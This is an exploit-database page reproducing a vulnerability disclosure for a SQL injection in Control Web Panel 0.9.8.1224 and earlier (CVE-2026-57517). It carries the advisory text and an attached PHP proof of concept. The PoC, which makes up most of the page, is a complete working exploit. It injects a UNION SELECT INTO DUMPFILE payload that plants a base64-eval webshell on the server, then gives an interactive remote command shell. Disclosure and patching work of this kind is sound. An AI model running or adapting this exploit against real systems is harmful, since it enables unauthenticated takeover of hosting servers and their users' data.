Share
## https://sploitus.com/exploit?id=PACKETSTORM:224887
---------------------------------------------------------------------
    Control Web Panel <= 0.9.8.1224 (userRes) SQL Injection Vulnerability
    ---------------------------------------------------------------------
    
    
    [-] Software Link:
    
    https://control-webpanel.com
    
    
    [-] Affected Versions:
    
    Version 0.9.8.1224 and prior versions.
    
    
    [-] Vulnerability Description:
    
    User input passed through the "userRes" POST parameter to
    https://[CWP_Host]:2083/[CWP_Username]/
    is not properly sanitized before being used to construct an SQL query. This
    can be exploited by remote, unauthenticated attackers to carry out (blind)
    SQL Injection attacks.
    
    Successful exploitation of this vulnerability requires the attacker to know
    or correctly guess the username of a valid non-root account on the affected
    CWP instance.
    
    NOTE: successful exploitation allows an unauthenticated attacker to execute
    arbitrary SQL queries with the privileges of the MySQL root user. Because
    this account possesses the global FILE privilege, the vulnerability can be
    leveraged to write arbitrary files to writable locations on the underlying
    filesystem using MySQL's file output capabilities (e.g., INTO DUMPFILE). By
    writing a malicious PHP payload to the web-accessible
    /usr/local/cwpsrv/var/services/roundcube/logs/ directory, an attacker might
    be able to execute arbitrary PHP code remotely, resulting in full Remote
    Code Execution (RCE) on the affected CWP instance with the privileges of
    the 'cwpsvc' account.
    
    
    [-] Proof of Concept:
    
    https://karmainsecurity.com/pocs/CVE-2026-57517.php
    
    
    [-] Solution:
    
    Upgrade to version 0.9.8.1225 or later.
    
    
    [-] Disclosure Timeline:
    
    [XX/YY/2025] - Vulnerability discovered
    [06/05/2026] - Version 0.9.8.1225 released, issue fixed by the vendor
    [26/06/2026] - CVE identifier requested
    [26/06/2026] - CVE identifier assigned
    [01/07/2026] - Public disclosure
    
    
    [-] CVE Reference:
    
    CVE-2026-57517 has been assigned to this vulnerability.
    
    
    [-] Credits:
    
    Vulnerability discovered by Egidio Romano.
    
    
    [-] Original Advisory:
    
    https://karmainsecurity.com/KIS-2026-12
    
    
    --- packet storm attached poc ---
    
    <?php
    
    /*
        ---------------------------------------------------------------------
        Control Web Panel <= 0.9.8.1224 (userRes) SQL Injection Vulnerability
        ---------------------------------------------------------------------
        
        author..............: Egidio Romano aka EgiX
        mail................: n0b0d13s[at]gmail[dot]com
        software link.......: https://control-webpanel.com
        
        +-------------------------------------------------------------------------+
        | This proof of concept code was written for educational purpose only.    |
        | Use it at your own risk. Author will be not responsible for any damage. |
        +-------------------------------------------------------------------------+
        
        [-] Original Advisory:
    
        https://karmainsecurity.com/KIS-2026-12
    */
    
    set_time_limit(0);
    error_reporting(E_ERROR);
    
    print "+-----------------------------------------------------------------------+\n";
    print "| Control Web Panel <= 0.9.8.1224 Remote Code Execution Exploit by EgiX |\n";
    print "+-----------------------------------------------------------------------+\n";
    
    if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
    
    if ($argc != 3)
    {
        print "\nUsage......: php $argv[0] <Hostname/IP> <Username>\n";
        print "\nExample....: php $argv[0] 127.0.0.1 egix";
        print "\nExample....: php $argv[0] cwp.victim.com bob\n\n";
        die();
    }
    
    function hex_enc($input)
    {
        for ($i = 0; $i < strlen($input); $i++)
        	$encoded .= sprintf("%02x", ord($input[$i]));
        	
        return "0x{$encoded}";
    }
    
    $ch = curl_init();
    
    curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2083/{$argv[2]}/");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    //curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080");
    
    print "\n[+] Injecting PHP webshell\n";
    
    $sh_fname  = uniqid() . ".php";
    $phpshell  = hex_enc("<?php eval(base64_decode(\$_SERVER['HTTP_C'])); ?>");
    $injection = "\" UNION SELECT 1,{$phpshell},3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE \"/usr/local/cwpsrv/var/services/roundcube/logs/{$sh_fname}\"#";
    
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["userRes" => $injection]));
    
    curl_exec($ch);
    
    print "[+] Executing PHP webshell\n";
    
    $phpcode = "print '___CMD___'; passthru(base64_decode('%s')); print '___CMD___';";
    
    curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2031/roundcube/logs/{$sh_fname}");
    curl_setopt($ch, CURLOPT_POST, false);
    
    while(1)
    {
        print "\ncwp-shell# ";
        if (($cmd = trim(fgets(STDIN))) == "exit") break;
        curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
        preg_match("/___CMD___(.*)___CMD___/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
    }